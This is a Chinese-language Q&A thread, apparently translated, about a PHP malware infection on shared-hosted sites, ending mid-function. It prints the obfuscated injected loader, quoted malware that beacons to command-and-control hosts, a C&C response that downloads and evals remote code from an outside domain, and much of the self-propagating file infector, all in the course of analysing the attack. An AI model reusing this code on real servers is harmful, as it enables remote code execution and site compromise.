3

我可能疯了在这里写这个,但我现在太害怕了。我在 iPage 上托管了 2 个网站。

我的两个网站上的所有 PHP 页面都在今天早上 9 点左右进行了修改,并且都具有以下前缀

<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZFJlbHBFVGsxaGJYTXhWMWN4YzAxSFRqVk9WM0JwVFdwQ2NGUjZUa3RpUjFKSlZtNXNhV0ZWUm5KWmJHTTFUVWRHU0ZadWJGQk5la1l5VjFkM05XVnRVa2hTYm14clVUSmtjRmxxVGtOaFIwcDBaRWhDU21GWGN6TlhiVFZYWkZacmVsVnVRbWxOYWxKdVYxWmtiMkpYVWxoVmJURnBVakZ2TWxkclpHOWlWMFpKVkZjNVMxTkZTbTlUTVdoNllUSktXRkp1VWxwVk1FVTFVMVZXYTJKSFVrWk5WMmhwVmpCV2RsTXhVbnBoTVhCMFlraE9ZVlV3UlRWVFZXaFhaVmRLU0ZadVZscE5hbXh5VjJ4T2IxcHNaM2RYYTNCVlVsWmFiVmRJYkhKT01rWllWMWRrVEZJeWVEWlpla3BYVFVWMFJGVnRXbFpOUmxwVVZtMTBWMVV4WkRWVGEyeFhVbXhLVWxkRVFtOVZSbFY0VlZkc1dWVXlkSGRhV0d4VFlqSkplbFJxUWtwU1JFSnVVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhkRzlXVmxwSFVXMWFWRkpVYkZWV2EwNUxXa1U0ZWsxSFpHRldNMmcyVjJ4T1EwNHdjRWhoU0ZwcVRURkdibFZHVGtKaFZXeHhaRVJzYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3VkZWc1ZYaFZSbHBHVm0xYVVsWldTa1pXVjJ4TFdrVjBWR0pFWkV0U01uZ3pVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4elUydGFWVlpVYkZaVmJGazFVV3hLUmxWc1RrcGlSRUV6V214T1EySkhTa2xVYlhoS1UwaE9jbGxXYUVKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFRWbHBIVld4R1dVMVZjRWRWYlhSWFZURktWMU5YYkZsVk1uUjNXbGhzVTJWV2NGaFhWMlJSVlRCSmVGa3lNVFJpUjBwMFZHNWFZVkl4Vm5aVGExazFWa1pLVjFOc1pGTldhM0JwVTFkMGIxWldXa2RSYlZwV1lURmFTRlZzV2t0U2JGWndVMjFTVEZaSVVUVlRWV1JYWXpKTmVWWlhaR3hsVmtvMVYyeGtXbG94UWxSUlYyeEtZVzVSTlZsV1pGcGFNSFJJWWtod2FrMXNXWGRUTUU1VFdteFZkMVpzVGxkaE1WcFVWak5zUzFOV1drZFZiRVpaVFZaYVZWVnNXa3RhYkVaV1drVmFWV0pHUm5CWFJrNXlZMGRXTlZWcVJscFZNRVUxVTFWb1YyVlhTa2hXYmxaYVRXcHNjbGRzVG05bGJWSkpVMnBDYVUxdWFESmFSRXBYWlZWMFJGVnRXbFpOUmxwVVZtMTBWMVV4WkRWVGEyeFhVbXhLVWxkRVJsZFdSa3BYVTIxYVVsWlhVa2RXUjNoU1lWWm9WR0V6UWxCTmVrSnVWMnhrTkdWc2NGUlJhbVJMVTBaYWIxTlZVWGRhTUd4d1UxUmtiVll5ZUhSVFZVNXZZMGROZWxSdGVHdFJNbVJ5VjBSR1QxSnNWbk5YYTFwV1lraE9jRlpXV2xkU2JGWnpZa2RhVmsxV1NsUlZNVlV4VTBWc2MwMUlRa3hYU0U1eVdURm9UbG94UWxSUmFrWnFZbGhvYzFsdE1VOWtiSEJJVmxjNVMxSnFiRlZWYkZwTFZqRktWMU50U2twaVJWcFhWV3hhUzFkc1ozaFViRlpXWVRKNFVGVnViRXRhUlhSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdWFHcGxWVVUxVTFWT1NtRlZPSHBOUjNSclYwVndlbGRJY0VKYU1VSlVVVmRzYUZOR1NYZFpNRkoyWkd0NE5WTlhaRTFoVlVaeVdUQmtSazR3Y0VsV2JteHBVbXBvTkZOVlVYZGFNR3h3VDFoR1lWWXhTbmRVUnpWRFlqSk9SVTlVU21GWFJYQTJXVlpqTldSV1FsVlJWRlpRVmtWV2RGbHNZelZOUjBaSVZtNXNVVlV3Ykc1VVIyeFRaRVpzV0UxWGFFcFJlbEp1VTFkc1lXSlhSbGhsUjNoUlZUQnNibFJIYkVKaE1YQjBZa2hPWVZVd1JqRlRWVTVLWWxkR1NFOVljR3RTUkVKd1UxVk5NRm93Y0VoaFNGcHFUVEZHYmxSSGJFSmhWWEIwWWtoa1VWVXdiRzVVUjJ4Q1lUSkdXVkZYWkUxaFZVWndVMjAxUzJKR2NIRk5SMnhLVVhwU2JsTnJhRXRpUm5Cd1VWaFdTbEV3YkhSYVJtUkdUMVZzY0ZGWVZrdFRSbHB2VTFWTk1Gb3diSEJYYm1ocVpXcENjRk5WVFRCYU1IQkpVbTV3VUdWV1NYZFpNalZ5V2pGQ1ZGRnFRbXBpYkZwelZIcEtjMkpWZEVSUmJURnJWbnBXY1ZwRlpITmtiVXB6VDFkNGJGSXllRFphUldoT1lqQnNkRlJxUm1waVdHaHRXVlpqTVdOSFVrUlRXRUpLVVRKM00xTnJaRTlpTUd4RlRVZGtXazB4V2pWWmExazFZMGRLZEdKRVFreFJNVWw0V1RJeE5GcHJNVVJSV0ZaS1VURkplRmt5TVRSYWF6RlVZWHBrV2sweFdqVlphMWsxWld4d1dWVnVXbXBUUmtaMlUydGtUMkl3ZUVSUmExSlhWbXR3VGxaRVJrTldWbWQ0VTJ0YVYxSnNXbFJXUjNoVFZURkdWazVXVWxOaE1WcFVWRVZPUW1WRmRGVmtSM0JyVjBWd2VsZEVUazlpUjFKSVQxaGthMUV5WkhKWFZFcHVZekJzUmxSc1dsWmhNMmhSVmxWYVUxcHNXa1ppUlRWVFZsUnNWMVpyVGpOYU1ERTFZWHBrUzFOR1ducGFSVTVDVDFWc1NWVnViR2hXZWtKMlYxUk9WMlZYU2tkUFYzaHNVakZhY1ZNd1RsTmhiVVpFWVROQ1VHVldTWGRaTWpWeVdqRkNWRkZ0TVZwV00yZzJWMnhTTUU5VmJFaGlSekZLVVRKa2RsbFdZekZqUm1kNVdrZDRhMUV5WkhCWFZtUTBZekpKZWxwSFdtdFhSWEI2VjBSS1lXUnRUa2hXYmxaS1lWZDBkMU5WVGxwaVZXeEVWV3BDYW1KdGRIZFRWV2g2WVRKU1dHVkVRa3BTUkVKdVdrVm9TMk5IU2xSaFJVWmhZbGQ0ZWxkc1dUVmliSEJaVlcxYVdrMXFiREZhUldSWFpGZFNTVlJYT1V0VFJsbzFXV3RaTkdRd2JFUk9SMlJMVTBaYU5WbHJXVFJsUlhSVVlYcGtTMU5HU2pWYVZrNUNUMVZzU0ZkdGFHbFRSVFZ6VkhwTmVHTkdjSEJhTW5SclUwVnZNVk14YUhwaE1YQjFVVmRrVVZVd1NuUlpla2sxWVcxRmVVOVlaR0ZXZWxKMlUydG9RMkZGZUVSUlZGSk9VVE5rYmxOclpGZGxWMDUwVGxoYVRWRXdSbkpYYkdoTFpWZE5lbFZ1YkUxUk1FWTJWRlZPY2s0eVJsaFhWMlJNVVRGS2RGa3dUbkphTWxZMVZXNWFhMWRHUm01VlJrNUNZVlpKZDFac1ZrcFJNVWw0V1RJeE5GcHJNVlJSYTJ4WFVteEtVbFJJY0Vaa1ZURkhaVWhzV1ZKNlVuQlVNMnhUWkcxU1dWVlhaRTFoYWtKdVUxZDBiMlJ0VFhwVlZGcEtVVEZLTTFkV1dqUmxWbWhJVGtkc1VHVldTakphUm1oU1dqQjRjVTFIWkVwaE1EVXlXVzB3TVdKR2EzcFZia0pwVFdwUk1sTlZWazlqTWtsNlZHMTRXVk5GY0dwWmJYZzBaVlpvU0U1SGJGQk5iRzk2V1RJeGMwMUdjRlJhTW5SaFltdEdlbE5WVGxOa2JWSlpWVmhDVUdWV1NqVlhiR2hTV2pGQ1ZGRlhiRXBoYmxGNldWVmtjMk14Y0ZSUlZ6bEtWakZ3YzFscVNscGlNSEJJVjI1a1RGVXlkRzVhV0d4VFpWWndXVlZYWkVwUmVsRTFVMVZPUTJKV2IzbFdha0pxWlZka2NsZHROVUpqTUd4RlVsaHNVRkV5Y3pOYWJHUmhZVzFLU0U5WWNHRlZNbVJ5VjIwMVFtTkZPVFZWYWtacFUwWkdibFZHVGtOTlIwNTBZa2hTVEZORk5IaFhWelZQVFVkT2NGb3lkR3BpVmxsM1ZFVk9RMlZ0VWtsVGJtUnBUVEF4ZGxOcmFFdGlSMUpFWkRKa1NtSklhRFZYUldNeFdUSk9jMlZJVmtwaFYzUnVVek5zUWsxRmRGUmhlbVJ0VjBSQ2JsTlZaSE5pVld4RVlVaHdhMU5GY0ROWmFrNU9ZakJ3U1ZadVRtdFJNMlJ3VjJ4b1lXRkhTa1JUV0VKS1VUQlZOVlZHVGtOaVZteFlaVWh3WVZVeWR6TlRhMmgyV2pGQ1ZGRnVjR3RUUlhCM1dUQm9UMk14YkZsVWJUbGhWMFV4ZGxsNlRsTmxWbWQ2VTIxNGFsSXphRzlYVkVwV1lqQnNkRlpxU2xwV00yUndWRVZPU21GVmVFUlZha1pwVTBaR2QxTXhVbnBhTVhCWlYyMW9hVkV5WkhKYVYyeHlUakJzU0ZacVVtaFhSa1oyVXpGU01FOVhSbGhYVjJSTVUwVTBkMWt5TlVOa2JVNDFXakowYTFZelozZFVSVTVMWWtac2RFNVhhRXBoVjNSdVUxWlJkMDlWYkVoWGJXaHBVMFUxYzFNeGFIcGhNV2Q0Vkd0YVZtSkdjRWRXVjNoNllWWnZlVTlZV21GUk1IQnJVMVZSZDFveVRYcFZibXhaVFRCd2Mxa3daRFJoUm10NVZsYzVTbUpXV25CWmJURkdZVlY0UkZOWGJFMVJNVWw0V1d0b1VtTkZPSHBUYlhoclUwWmFOVmx0YkVOTlIwNTFWbTE0VUUxNlJuTlphMmhQWWtWc1NXUkliR0ZYUmtsNFdUSXdNRm94Y0hSU2JrNXFUV3hWTTFwc1ozZGhNWEIwVW1wQ2FGSXhXalZVVjNnd1drVnNSVTFIWkVwaGJVMHdWRWR3VWsxcmVIRlNWRTVPWlZSU05GUnJUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cwVkc1d1dtUlZPVlJPU0d4T1ZrZGtNVlJXVW5KbFJXeHhZekowWVdKVldYZFpWV1JYWlZVeGMyUkhVa3BTUkVKdVUxZHdjbVZGZUhGVFdHeFFVWHBTTkZSc1VsSmtWVEZ4VmxSQ1NtRnVUbkpYYlRGSFRVZEdTRlp1YkU1aVNGSnJVMVZSZDFvd2JIRlplazVOWVcxa05GUkhjRXBOUlRGVVRraHNUMVpGTVhCVU0yeFRZbFpzV1ZWdE9XRlhSV3cxVm5wRmQxb3hRbFJSVjJ4T1ZrZGpkMVJIY0c1bFZYaHhVbGhvVDJWVVVqUlVWbEpDWVZVNU5WVnRNVnBYUmtwMlYyeG9TbVZXWTNoTlIyUlJWVEJHY0ZSclVscGtWVFZFVGtoc1RsSkZiREZVTVZKT1lWVTVOVlZ0TVZwWFJrcDJWMnhvU21WV1kzaE5SMlJSVlRCR2NGUnJVbHBrVlRGeFZWUldUV0ZzVlRCVVIzQkdaV3MxVkZOVVpFdFNNWEJ2V2tWa2IySkhUbkZUYlVwWlZUQkZOVk5WVGtwbFJUVTJWMWhXVUZWNlVqVlVhMUpHWkZVeFZWWllaRXBoYms1eVYyMHhSMDFIUmtoV2JteE9Za2hTYTFOVlVYZGFNR3h4VlZSS1RXRnJNSHBVUjNCR1RXczVWRTVFUms5aFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxUkNUMkZVVWpaVVZVMHdUVVV4VkU1RVZsQlZNR3N6VTJ0a1lXRkhVa2hoUjNocVlXdHdhVmRHVGtKUFZXeEVVMVJXVDFGNlVqVlVhMUpLWkZVeGNWWlVSazFoYXpCNFUxZHdlbUV4Y0hSU2FrSm9VakZhTlZSWGVEQmFSV3hGVFVka1NtRnJWWHBVTUUwd1pVVTFjVk5ZVms1V1JXc3hWRWR3U21WVk1UVlRWR1JMVWpGd2IxcEZaRzlpUjA1eFUyMUtXVlV3UlRWVFZVNUtUVEE1UkU1RVFrOWxWRkkwVkRCU1VtUlZNVFpVVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeE5sSllWazVXUjJOM1ZFZHdTbVZyTlVST1JGWlBZVlZyTTFsNlNtOU5WbkIwVjI1T1lWVXlaSEpYYlRGSFRVZEdTRlp1YkU1aFYzTXpWMjB3TldWV2NGaFNiWEJvVVRKa2NsZHRNVWROUjBaSVZtNXNUbUZWU205Wk0yeENZVEpTV1ZOWVFteE5iWGgwVTFWT2Jsb3hiRmhoUnpGclZqRktkRmxyWkdGT2JIQklZVWN4YUZORk1YWlRhMmhYWlZWMFZGRllRa3BUU0U1dVYxYzFTMkpHYkZoak1tUlFUWHBGTlZwc1JUbFFVMGx3UzFSelp5SXBLVHNnIikpOyA=";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>

我尝试获得 iPage 支持,但他们不知道发生了什么。他们刚刚为我创建了一张支持票,将在 48 小时内进行调查!!

更新

收到有关黑客攻击的电子邮件

来自:可怜的受害者 haha​​haha@gmail.com

消息:为什么此代码在我的服务器上?你为什么要盗用我的文件???此代码指向您!准备诉讼

if (!function_exists("GetMama")){ function mod_con($buf){ str_ireplace("","",$buf,$cnt_h);if ($cnt_h == 1) { $buf = str_ireplace("", "" . stripslashes($_SERVER["good"]),$buf); 返回 $buf; }str_ireplace("","",$buf,$cnt_h);if ($cnt_h == 1) { $buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf) ; 返回 $buf; }return $buf; }function opanki($buf){ $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true; }if ($gz_e){ $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($ zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname); $contents = gzencode($contents); } 其他 {$contents = mod_con($buf); }$len = strlen($contents);header("内容长度:".$len);return($contents); } function GetMama(){ $mother = "www.99bits.com";return $mother; }ob_start("opanki");function ahfudflfzdhfhs($pa){ $mama = GetMama();$file = urlencode(文件);if (isset($_SERVER["HTTP_HOST"])){ $host = $_SERVER["HTTP_HOST"]; } 其他 {$host = ""; }if (isset($_SERVER["REMOTE_ADDR"])){ $ip = $_SERVER["REMOTE_ADDR"]; } 其他 {$ip = ""; }if (isset($_SERVER["HTTP_REFERER"])){ $ref = urlencode($_SERVER["HTTP_REFERER"]); } 其他 {$ref = ""; }if (isset($_SERVER["HTTP_USER_AGENT"])){ $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"])); } 其他 {$ua = ""; }if (isset($_SERVER["QUERY_STRING"])){ $qs = urlencode($_SERVER["QUERY_STRING"]); } 其他 {$qs = ""; }$url_0 = "http://" 。$pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . “&文件=”。$文件。“&主机=”。$主机。"& foreach($father2 as $ur){ if ( ahfudflfzdhfhs($ur) ) { break ; } } }

发送自(IP 地址):64.118.163.18 (64.118.163.18) 日期/时间:2012 年 4 月 9 日晚上 7:15 来自(推荐人): http ://www.99bits.com/contact-us/使用(用户代理): Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19

感谢你们每一个人的帮助和知识。由于一些奇怪和未知的原因,我的博客成为了这次黑客攻击的目标。我暂时关闭了博客,直到我可以清理所有文件(因为我所有的 PHP 文件都被感染了)。

4

4 回答 4

7

在当前形式中,脚本具有以下命令和控制服务器(“c&c”):

$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";

该脚本在每次运行时随机排列它们的顺序。然后它尝试发送包含这些变量的 GET 请求

$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__

到第一个 c&c 服务器,如果响应不包含evalebna(或服务器已关闭),它会尝试下一个 c&c 服务器,依此类推。

如果 c&c 服务器返回:ebna <somestring><somestring>将被放置在您网站的 body 标签内。所以黑客可以插入任意html/js代码。

在 c&c 服务器返回的另一种情况下eval <somestring><somestring>将传递给 eval()。这样黑客甚至可以执行任意 php 代码。

我设法让 c&c 服务器通过省略所有 url 参数来返回 eval 响应,如下所示:http://<server-ip>/jedi.php,这是响应:

eval $try = true;
if (function_exists("curl_init")) {
    $ch = curl_init('http://2brewers.com/99.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    $try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
    $ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
    $try = false;
}
if ($try) {
    $fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
    if ($fp) {
        $out = "GET /99.txt HTTP/1.0\r\n";
        $out. = "Host: 2brewers.com\r\n";
        $out. = "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $ret = '';
        while (!feof($fp)) {
            $ret. = fgets($fp, 128);
        }
        fclose($fp);
        $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
    }
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);

加载并执行http://2brewers.com/99.txt,如下所示:

function get_file_extension($file_name) {
    return substr(strrchr($file_name, '.'), 1);
}

function pass_gen($dol) {
    $source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $source[1] = "0123456789";
    $length = rand(5, 50);
    $passwordlen = intval($length) - 1;
    $use = implode("", $source);
    $max_num = strlen($use) - 1;
    $rp = '';
    for ($i = 0; $i < $passwordlen; $i++) {
        $x = rand(0, $max_num);
        $rp. = $use[$x];
    }
    if ($dol) {
        return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
    } else {
        return $source[0][rand(0, strlen($source[0]) - 1)].$rp;

    }
}

function GetMass($text, $code, $massname) {
    $a = str_split($text);
    foreach($a as $b) {
        $evmas[] = ord($b) + $code;
    }
    $z = $massname."= array('".implode("','", $evmas)."');";
    return $z;
}


function Codee($code) {


    $coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';

    $f1 = pass_gen(false);
    $coo = str_replace('F1', $f1, $coo);
    $v1 = pass_gen(true);
    $coo = str_replace('$v1', $v1, $coo);
    $v2 = pass_gen(true);
    $coo = str_replace('$v2', $v2, $coo);
    $v3 = pass_gen(true);
    $coo = str_replace('$v3', $v3, $coo);
    $v4 = pass_gen(true);
    $coo = str_replace('$v4', $v4, $coo);
    $v5 = pass_gen(true);
    $coo = str_replace('$v5', $v5, $coo);
    $v6 = pass_gen(true);
    $coo = str_replace('$v6', $v6, $coo);
    $v7 = pass_gen(true);
    $coo = str_replace('$v7', $v7, $coo);
    $v8 = pass_gen(true);
    $coo = str_replace('$v8', $v8, $coo);
    $v9 = pass_gen(true);
    $coo = str_replace('$v9', $v9, $coo);
    $v0 = pass_gen(true);
    $coo = str_replace('$v0', $v0, $coo);
    $mas1 = pass_gen(true);
    $coo = str_replace('$mas1', $mas1, $coo);
    $mas2 = pass_gen(true);
    $coo = str_replace('$mas2', $mas2, $coo);
    $mas3 = pass_gen(true);
    $coo = str_replace('$mas3', $mas3, $coo);
    $code1 = rand(1000, 10000);
    $coo = str_replace('$code1', $code1, $coo);
    $code2 = rand(1000, 10000);
    $coo = str_replace('$code2', $code2, $coo);
    $code3 = rand(1000, 10000);
    $coo = str_replace('$code3', $code3, $coo);

    for ($i = 0; $i < 3; $i++) {
        $code = base64_encode($code);
        $code = 'eval(base64_decode("'.$code.'")); ';
    }
    $code = base64_encode($code);


    $z = GetMass('eval', $code1, $mas1);
    $z. = GetMass('create_function', $code2, $mas2);
    $z. = GetMass('base64_decode', $code3, $mas3);
    $z. = $v0.'="'.$code.'";';
    $z. = $coo;
    return $z;

}

function modify($fname) {


    $tmp = file_get_contents($fname);
    $md_start = md5($tmp);

    chmod($fname, 0666);
    $md = md5($fname);



    $pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/<\?php[\s]*\?>/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pos = strpos($tmp, 'GetMama');
    $pos2 = strpos($tmp, 'god_mode_on');
    if (($pos === false) && ($pos2 === false)) {

